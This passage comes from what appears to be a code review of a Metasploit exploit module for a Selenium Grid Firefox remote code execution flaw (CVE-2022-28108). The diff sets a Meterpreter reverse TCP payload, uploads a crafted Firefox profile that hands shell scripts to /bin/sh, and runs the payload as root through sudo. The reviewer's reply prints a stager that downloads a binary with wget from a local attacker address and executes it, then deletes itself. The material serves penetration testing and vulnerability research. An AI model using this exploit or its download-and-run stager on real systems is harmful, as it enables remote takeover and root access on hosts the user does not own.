modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb

```diff
@@ -0,0 +1,142 @@
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-04-18',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(4444),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200
+
+    js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
+    return Exploit::CheckCode::Unknown unless js_code
+
+    json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
+    json_data = JSON.parse(json_str)
+    return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']
+
+    # Extract the version
+    version = Rex::Version.new(json_data['version'])
+    if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
+      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
+    end
+
+    print_status("Version #{version} detected, which is vulnerable")
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    # Build profile zip file.
+    stringio = Zip::OutputStream.write_buffer do |io|
+      # Create a handler for shell scripts
+      io.put_next_entry('handlers.json')
+      io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
+    end
+    stringio.rewind
+    encoded_profile = Base64.strict_encode64(stringio.sysread)
+
+    # Create session with our new profile
+    new_session = {
+      desiredCapabilities: {
+        browserName: 'firefox',
+        firefox_profile: encoded_profile
+      },
+      capabilities: {
+        firstMatch: [
+          {
+            browserName: 'firefox',
+            "moz:firefoxOptions": { profile: encoded_profile }
+          }
+        ]
+      }
+    }
+
+    hub_url = full_uri(normalize_uri(target_uri.path, 'wd/hub'))
+    uri = URI.parse(hub_url)
+    http = Net::HTTP.new(uri.host, uri.port)
+
+    # Start session with encoded_profile and save session id for cleanup.
+    session_uri = URI.parse("#{hub_url}/session")
+    request = Net::HTTP::Post.new(session_uri.request_uri, 'Content-Type' => 'application/json; charset=utf-8')
+    request.body = JSON.generate(new_session)
+    response = http.request(request)
+    session_id = JSON.parse(response.body)['value']['sessionId'] || JSON.parse(response.body)['sessionId']
+
+    sudo_payload = "rm -rf $0\nsudo su root -c '#{payload.encoded}'"
```

Comment:
What is the purpose of the `rm -rf $0` here?

Reply:
When I replace `rm -rf $0` with `echo $0 > /tmp/whatisthis`, the result of `cat /tmp/whatisthis` is `/tmp/jus1lPj+`. The result of `cat /tmp/jus1lPj+` is:
```bash
echo $0 >/tmp/whatisthis
if sudo -n true 2>/dev/null; then
  sudo su root -c 'wget -qO ./XpnSbDIBRf http://192.168.56.1:8080/ndMYiHwpoiRjImNJZrt2GA; chmod +x ./XpnSbDIBRf; ./XpnSbDIBRf&'
else
  wget -qO ./XpnSbDIBRf http://192.168.56.1:8080/ndMYiHwpoiRjImNJZrt2GA; chmod +x ./XpnSbDIBRf; ./XpnSbDIBRf&
fi
```

When I replace `echo $0 > /tmp/whatisthis` with `rm -rf $0`, there is no file equivalent to `/tmp/jus1lPj+`.

So, I believe the purpose of `rm -rf $0` is to clean up after the payload.